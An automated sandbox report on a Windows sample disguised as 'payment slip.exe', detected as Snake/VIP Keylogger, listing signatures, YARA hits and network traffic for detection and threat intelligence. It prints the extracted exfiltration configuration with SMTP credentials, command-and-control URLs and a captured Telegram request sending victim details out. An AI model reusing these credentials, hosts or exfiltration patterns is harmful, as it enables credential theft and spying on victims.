Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
payment slip.exe

Overview

General Information

Sample name:payment slip.exe
Analysis ID:1485149
MD5:0cac6a293391fdb0f89189a89dc47150
SHA1:080ab6bad708ce618e411d2f1aab56cd24b058ba
SHA256:51b79481d9e411146f4d43f1c3028b71c020ebd3ebb2e0eaeddc03a7ca0c1106
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • payment slip.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\payment slip.exe" MD5: 0CAC6A293391FDB0F89189A89DC47150)
    • RegSvcs.exe (PID: 1104 cmdline: "C:\Users\user\Desktop\payment slip.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d5cf:$a1: get_encryptedPassword
        • 0x2d8ec:$a2: get_encryptedUsername
        • 0x2d3df:$a3: get_timePasswordChanged
        • 0x2d4e8:$a4: get_passwordField
        • 0x2d5e5:$a5: set_encryptedPassword
        • 0x2ec45:$a7: get_logins
        • 0x2eba8:$a10: KeyLoggerEventArgs
        • 0x2e80d:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.580000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.580000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.RegSvcs.exe.580000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.RegSvcs.exe.580000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.RegSvcs.exe.580000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d7cf:$a1: get_encryptedPassword
                  • 0x2daec:$a2: get_encryptedUsername
                  • 0x2d5df:$a3: get_timePasswordChanged
                  • 0x2d6e8:$a4: get_passwordField
                  • 0x2d7e5:$a5: set_encryptedPassword
                  • 0x2ee45:$a7: get_logins
                  • 0x2eda8:$a10: KeyLoggerEventArgs
                  • 0x2ea0d:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 15 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 1104, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49725

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-07-31T09:00:33.864966+0200
                  SID:2803274
                  Source Port:49705
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-31T09:00:33.118074+0200
                  SID:2803305
                  Source Port:49704
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-31T09:00:40.378056+0200
                  SID:2803305
                  Source Port:49712
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-31T09:00:44.027841+0200
                  SID:2803305
                  Source Port:49716
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-31T09:00:37.056967+0200
                  SID:2803305
                  Source Port:49710
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-31T09:00:45.364061+0200
                  SID:2803305
                  Source Port:49719
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-31T09:00:32.568020+0200
                  SID:2803274
                  Source Port:49702
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-31T09:00:31.588618+0200
                  SID:2803274
                  Source Port:49702
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587"}
                  Multi AV Scanner detection for domain / URL
                  Source: http://varders.kozow.com:8081Virustotal: Detection: 14%Perma Link
                  Source: http://aborters.duckdns.org:8081Virustotal: Detection: 11%Perma Link
                  Source: http://anotherarmy.dns.army:8081Virustotal: Detection: 14%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: payment slip.exeReversingLabs: Detection: 23%
                  Source: payment slip.exeVirustotal: Detection: 22%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: payment slip.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: payment slip.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49721 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0006C2A2 FindFirstFileExW,0_2_0006C2A2
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B7F475h2_2_00B7F2D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B7F475h2_2_00B7F4C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00B7FC31h2_2_00B7F979
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F431E0h2_2_05F42DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F42C19h2_2_05F42968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4F661h2_2_05F4F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F40D0Dh2_2_05F40B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F41697h2_2_05F40B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F431E0h2_2_05F42DC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4DC51h2_2_05F4D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4D7F9h2_2_05F4D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F431E0h2_2_05F4310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4D3A1h2_2_05F4D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4CF49h2_2_05F4CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_05F40040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4FAB9h2_2_05F4F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4F209h2_2_05F4EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4EDB1h2_2_05F4EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4E959h2_2_05F4E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4E501h2_2_05F4E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05F4E0A9h2_2_05F4DE00

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.7:49725 -> 208.91.199.115:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: global trafficTCP traffic: 192.168.2.7:49725 -> 208.91.199.115:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_000ACE44
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.tradolgt.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 31 Jul 2024 07:00:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.tradolgt.com
                  Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                  Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
